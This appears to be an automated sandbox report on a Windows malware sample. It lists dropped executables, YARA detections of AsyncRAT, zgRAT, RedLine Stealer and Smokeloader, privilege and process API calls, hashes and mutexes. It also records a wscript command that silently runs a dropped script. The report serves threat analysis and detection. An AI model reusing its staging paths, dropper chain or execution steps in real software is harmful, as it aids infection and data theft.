Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Wireless entropy: 7.9965436862	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\591950\E entropy: 7.99975204156	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe entropy: 7.99818162851	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe entropy: 7.99818162851	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\TrackGuard Technologies\z entropy: 7.99975204156	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe entropy: 7.99821613014	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe entropy: 7.99821613014	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001F.00000002.4168709454.0000000002A0F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Windows.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: GOLD[1].exe.11.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296
Source: GOLD.exe.11.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296

PE file contains section with special chars

Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: 36f677264b.exe.11.dr	Static PE information: section name:
Source: 36f677264b.exe.11.dr	Static PE information: section name: .idata
Source: 36f677264b.exe.11.dr	Static PE information: section name:

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

Code function: 31_2_004205E7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

31_2_004205E7

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00614254: CreateFileW,DeviceIoControl,CloseHandle,

19_2_00614254

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00608F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

19_2_00608F2E

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_00403899 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		0_2_00403899
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00615778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		19_2_00615778

Creates files inside the system directory

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\ProjectionAcademy	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\ChipSeems	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\LaboratoriesFriend	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\ConditionSuperintendent	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\AyePercent	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\CuDefense	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	File created: C:\Windows\Tasks\Hkbsse.job

Detected potential crypto function

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_00407577	0_2_00407577
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005BB020	19_2_005BB020
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005B94E0	19_2_005B94E0
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005B9C80	19_2_005B9C80
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D23F5	19_2_005D23F5
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00638400	19_2_00638400
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E6502	19_2_005E6502
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E265E	19_2_005E265E
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005BE6F0	19_2_005BE6F0
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D282A	19_2_005D282A
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E89BF	19_2_005E89BF
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E6A74	19_2_005E6A74
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00630A3A	19_2_00630A3A
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005C0BE0	19_2_005C0BE0
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DCD51	19_2_005DCD51
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0060EDB2	19_2_0060EDB2
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00618E44	19_2_00618E44
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00630EB7	19_2_00630EB7
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E6FE6	19_2_005E6FE6
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D33B7	19_2_005D33B7
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005CD45D	19_2_005CD45D
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DF409	19_2_005DF409
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005B1663	19_2_005B1663
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005CF628	19_2_005CF628
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D16B4	19_2_005D16B4
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005BF6A0	19_2_005BF6A0
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D78C3	19_2_005D78C3
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D1BA8	19_2_005D1BA8
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DDBA5	19_2_005DDBA5
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E9CE5	19_2_005E9CE5
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005CDD28	19_2_005CDD28
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DBFD6	19_2_005DBFD6
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D1FC0	19_2_005D1FC0
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CA8C8F	24_2_00CA8C8F
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C96620	24_2_00C96620
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C998E0	24_2_00C998E0
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CAA88C	24_2_00CAA88C
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C95880	24_2_00C95880
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC6052	24_2_00CC6052
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC81F1	24_2_00CC81F1
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CAB9AC	24_2_00CAB9AC
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C9CAF0	24_2_00C9CAF0
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB0B00	24_2_00CB0B00
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB7CC0	24_2_00CB7CC0
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CA4C60	24_2_00CA4C60
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB641B	24_2_00CB641B
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CBF42E	24_2_00CBF42E
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CAC660	24_2_00CAC660
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC1E79	24_2_00CC1E79
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CCA611	24_2_00CCA611
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C94780	24_2_00C94780
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CCA731	24_2_00CCA731
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00748C8F	27_2_00748C8F
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00736620	27_2_00736620
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00766052	27_2_00766052
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007398E0	27_2_007398E0
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00735880	27_2_00735880
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0074A88C	27_2_0074A88C
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007681F1	27_2_007681F1
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0074B9AC	27_2_0074B9AC
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0073CAF0	27_2_0073CAF0
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00750B00	27_2_00750B00
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00744C60	27_2_00744C60
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0075F42E	27_2_0075F42E
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0075641B	27_2_0075641B
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00757CC0	27_2_00757CC0
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00761E79	27_2_00761E79
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0074C660	27_2_0074C660
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0074AE2C	27_2_0074AE2C
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0076A611	27_2_0076A611
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0076A731	27_2_0076A731
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00734780	27_2_00734780
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0040B219	31_2_0040B219
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00425054	31_2_00425054
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0044B17B	31_2_0044B17B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0044C240	31_2_0044C240
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0044B29B	31_2_0044B29B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004466F0	31_2_004466F0
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00427843	31_2_00427843
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00424865	31_2_00424865
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0043B8A3	31_2_0043B8A3
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0044AA29	31_2_0044AA29
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00404AF0	31_2_00404AF0
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00429BE5	31_2_00429BE5
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00446B88	31_2_00446B88
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00404C70	31_2_00404C70
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00404E70	31_2_00404E70
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B152BB	31_2_02B152BB
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B3B3E2	31_2_02B3B3E2
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF50D7	31_2_02AF50D7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B3C4A7	31_2_02B3C4A7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B3B502	31_2_02B3B502
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B17AAA	31_2_02B17AAA
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B14ACC	31_2_02B14ACC
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B2BB0A	31_2_02B2BB0A
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B36957	31_2_02B36957
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF4ED7	31_2_02AF4ED7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B19E4C	31_2_02B19E4C
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B3AC90	31_2_02B3AC90
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF4D57	31_2_02AF4D57

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe AB0CA1D93238D0EFC02A41A7B311EFE3FC07C042F22D0608D33EA5313A667E55
Source: Joe Sandbox View	Dropped File: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe 6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
Source: Joe Sandbox View	Dropped File: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe 3F074FB6A883663F2937FD9435FC90F8D31CEABE496627D40B3813DBCC472ED0

Enables security privileges

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process token adjusted: Security

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: String function: 005D8B30 appears 42 times
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: String function: 005D0D17 appears 70 times
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: String function: 005C1A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: String function: 007507C0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: String function: 00CB07C0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 02B0BCB7 appears 133 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 02B115F9 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 00421392 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 02B11C37 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 004219D0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 0041BA50 appears 128 times

PE file contains more sections than normal

Source: channel2.exe.11.dr	Static PE information: Number of sections : 18 > 10
Source: Channel1[1].exe.11.dr	Static PE information: Number of sections : 18 > 10
Source: channel2[1].exe.11.dr	Static PE information: Number of sections : 18 > 10
Source: 3546345.exe.11.dr	Static PE information: Number of sections : 18 > 10

PE file contains strange resources

Source: meta[1].exe.11.dr	Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
Source: meta.exe.11.dr	Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Uses 32bit PE files

Source: wfJfUGeGT3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001F.00000002.4168709454.0000000002A0F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\Windows.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: GOLD[1].exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GOLD.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypteda[1].exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypteda.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: build2[1].exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: build2.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: meta[1].exe.11.dr	Static PE information: Section: .rsrc ZLIB complexity 0.9984809027777778
Source: meta.exe.11.dr	Static PE information: Section: .rsrc ZLIB complexity 0.9984809027777778
Source: random[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9974135728882834
Source: random[1].exe.11.dr	Static PE information: Section: prspuaeb ZLIB complexity 0.9943780728545888
Source: 36f677264b.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9974135728882834
Source: 36f677264b.exe.11.dr	Static PE information: Section: prspuaeb ZLIB complexity 0.9943780728545888

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@95/66@0/13

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_0061A6AD GetLastError,FormatMessageW,

19_2_0061A6AD

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00608DE9 AdjustTokenPrivileges,CloseHandle,		19_2_00608DE9
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00609399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		19_2_00609399

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_0061B976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

19_2_0061B976

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00614148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

19_2_00614148

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_0061C9DA CoInitialize,CoCreateInstance,CoUninitialize,

19_2_0061C9DA

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_0061443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

19_2_0061443D

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif

File created: C:\Users\user\AppData\Local\TrackGuard Technologies

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\349587345342
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Mutant created: \Sessions\1\BaseNamedObjects\QGOn8xsapkNWVjl5
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Mutant created: \Sessions\1\BaseNamedObjects\1623b75a3df63053c0bc46185e9e5487
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_03

